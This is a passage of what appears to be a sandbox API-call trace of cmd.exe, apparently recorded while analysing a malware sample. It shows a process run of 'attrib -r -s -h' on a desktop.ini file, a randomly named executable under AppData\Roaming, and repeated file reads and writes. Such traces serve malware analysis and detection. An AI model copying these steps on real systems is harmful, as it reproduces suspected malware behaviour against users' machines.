(lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0216.667] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0216.667] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0216.667] GetEnvironmentStringsW () returned 0x410418* [0216.667] FreeEnvironmentStringsW (penv=0x410418) returned 1 [0216.667] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a375260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0216.667] GetConsoleOutputCP () returned 0x1b5 [0216.668] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a374260 | out: lpCPInfo=0x4a374260) returned 1 [0216.668] GetUserDefaultLCID () returned 0x409 [0216.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a374950, cchData=8 | out: lpLCData=":") returned 2 [0216.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf928, cchData=128 | out: lpLCData="0") returned 2 [0216.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf928, cchData=128 | out: lpLCData="0") returned 2 [0216.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf928, cchData=128 | out: lpLCData="1") returned 2 [0216.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a374940, cchData=8 | out: lpLCData="/") returned 2 [0216.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a374d80, cchData=32 | out: lpLCData="Mon") returned 4 [0216.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a374d40, cchData=32 | out: lpLCData="Tue") returned 4 [0216.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a374d00, cchData=32 | out: lpLCData="Wed") returned 4 [0216.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a374cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0216.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a374c80, cchData=32 | out: lpLCData="Fri") returned 4 [0216.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a374c40, cchData=32 | out: lpLCData="Sat") returned 4 [0216.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a374c00, cchData=32 | out: lpLCData="Sun") returned 4 [0216.668] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a374930, cchData=8 | out: lpLCData=".") returned 2 [0216.668] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a374920, cchData=8 | out: lpLCData=",") returned 2 [0216.668] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0216.669] GetConsoleTitleW (in: lpConsoleTitle=0x400a70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.669] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0216.669] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0216.669] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0216.669] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0216.670] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0216.670] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0216.670] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0216.670] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0216.670] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0216.670] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0216.670] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0216.672] _wcsicmp (_String1="del", _String2=")") returned 59 [0216.672] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0216.672] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0216.672] _wcsicmp (_String1="IF", _String2="del") returned 5 [0216.672] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0216.672] _wcsicmp (_String1="REM", _String2="del") returned 14 [0216.672] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0216.673] _wcsicmp (_String1="type", _String2=")") returned 75 [0216.674] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0216.674] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0216.674] _wcsicmp (_String1="IF", _String2="type") returned -11 [0216.674] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0216.674] _wcsicmp (_String1="REM", _String2="type") returned -2 [0216.674] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0216.676] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0216.676] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0216.677] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0216.677] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0216.677] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0216.677] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0216.726] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0216.726] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0216.730] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0216.731] FindClose (in: hFindFile=0x4124e8 | out: hFindFile=0x4124e8) returned 1 [0216.731] FindClose (in: hFindFile=0x4124e8 | out: hFindFile=0x4124e8) returned 1 [0216.732] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0216.732] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0216.732] GetConsoleTitleW (in: lpConsoleTitle=0x2cf350, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.732] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cf1d8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf2a0 | out: lpAttributeList=0x2cf1d8, lpSize=0x2cf2a0) returned 1 [0216.732] UpdateProcThreadAttribute (in: lpAttributeList=0x2cf1d8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf298, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cf1d8, lpPreviousValue=0x0) returned 1 [0216.732] GetStartupInfoW (in: lpStartupInfo=0x2cf194 | out: lpStartupInfo=0x2cf194*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0216.732] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0216.733] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\Default\\Searches\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2cf234*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\Default\\Searches\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf280 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\Default\\Searches\\desktop.ini\" ", lpProcessInformation=0x2cf280*(hProcess=0x50, hThread=0x4c, dwProcessId=0x170, dwThreadId=0xbcc)) returned 1 [0216.739] CloseHandle (hObject=0x4c) returned 1 [0216.739] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0216.739] GetEnvironmentStringsW () returned 0x410838* [0216.739] FreeEnvironmentStringsW (penv=0x410838) returned 1 [0216.739] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0216.864] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2cf174 | out: lpExitCode=0x2cf174*=0x0) returned 1 [0216.864] CloseHandle (hObject=0x50) returned 1 [0216.864] _vsnwprintf (in: _Buffer=0x2cf2bc, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cf180 | out: _Buffer="00000000") returned 8 [0216.864] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0216.864] GetEnvironmentStringsW () returned 0x412558* [0216.864] FreeEnvironmentStringsW (penv=0x412558) returned 1 [0216.864] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0216.864] GetEnvironmentStringsW () returned 0x412558* [0216.864] FreeEnvironmentStringsW (penv=0x412558) returned 1 [0216.864] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cf1d8 | out: lpAttributeList=0x2cf1d8) [0216.864] GetConsoleTitleW (in: lpConsoleTitle=0x2cf558, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.865] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches\\desktop.ini" (normalized: "c:\\users\\default\\searches\\desktop.ini")) returned 0x20 [0216.865] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches" (normalized: "c:\\users\\default\\searches")) returned 0x11 [0216.866] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0216.866] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0216.866] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches\\desktop.ini" (normalized: "c:\\users\\default\\searches\\desktop.ini")) returned 0x20 [0216.866] FindNextFileW (in: hFindFile=0x412c78, lpFindFileData=0x4135e4 | out: lpFindFileData=0x4135e4) returned 0 [0216.867] GetLastError () returned 0x12 [0216.867] FindClose (in: hFindFile=0x412c78 | out: hFindFile=0x412c78) returned 1 [0216.868] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0216.868] GetConsoleTitleW (in: lpConsoleTitle=0x2cf4f4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.869] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0216.869] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.870] GetFileType (hFile=0x50) returned 0x1 [0216.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.870] GetFileType (hFile=0x50) returned 0x1 [0216.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.870] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.871] GetFileType (hFile=0x50) returned 0x1 [0216.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.871] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.871] GetFileType (hFile=0x50) returned 0x1 [0216.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.871] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.872] GetFileType (hFile=0x50) returned 0x1 [0216.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.872] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.872] GetFileType (hFile=0x50) returned 0x1 [0216.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.872] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.872] GetFileType (hFile=0x50) returned 0x1 [0216.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.872] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.872] GetFileType (hFile=0x50) returned 0x1 [0216.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.872] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.872] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.872] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.872] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.872] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.872] GetFileType (hFile=0x50) returned 0x1 [0216.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.872] GetFileType (hFile=0x50) returned 0x1 [0216.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.872] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.873] GetFileType (hFile=0x50) returned 0x1 [0216.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.873] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.873] GetFileType (hFile=0x50) returned 0x1 [0216.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.873] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.873] GetFileType (hFile=0x50) returned 0x1 [0216.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.873] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.873] GetFileType (hFile=0x50) returned 0x1 [0216.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.873] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.873] GetFileType (hFile=0x50) returned 0x1 [0216.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.874] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.874] GetFileType (hFile=0x50) returned 0x1 [0216.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.874] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.874] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.874] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.874] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.874] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.874] GetFileType (hFile=0x50) returned 0x1 [0216.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.874] GetFileType (hFile=0x50) returned 0x1 [0216.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.874] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.874] GetFileType (hFile=0x50) returned 0x1 [0216.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.874] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.874] GetFileType (hFile=0x50) returned 0x1 [0216.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.875] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.875] GetFileType (hFile=0x50) returned 0x1 [0216.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.875] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.875] GetFileType (hFile=0x50) returned 0x1 [0216.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.875] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.875] GetFileType (hFile=0x50) returned 0x1 [0216.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.875] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.875] GetFileType (hFile=0x50) returned 0x1 [0216.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.875] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.875] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.875] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.876] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.876] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.876] GetFileType (hFile=0x50) returned 0x1 [0216.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.876] GetFileType (hFile=0x50) returned 0x1 [0216.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.876] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.876] GetFileType (hFile=0x50) returned 0x1 [0216.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.876] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.876] GetFileType (hFile=0x50) returned 0x1 [0216.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.876] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.876] GetFileType (hFile=0x50) returned 0x1 [0216.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.876] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.876] GetFileType (hFile=0x50) returned 0x1 [0216.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.877] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.877] GetFileType (hFile=0x50) returned 0x1 [0216.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.877] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.877] GetFileType (hFile=0x50) returned 0x1 [0216.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.877] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.877] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.877] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.877] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.877] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.877] GetFileType (hFile=0x50) returned 0x1 [0216.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.877] GetFileType (hFile=0x50) returned 0x1 [0216.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.877] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.877] GetFileType (hFile=0x50) returned 0x1 [0216.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.877] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.877] GetFileType (hFile=0x50) returned 0x1 [0216.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.877] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.877] _get_osfhandle (_FileHandle=1) returned 0x50 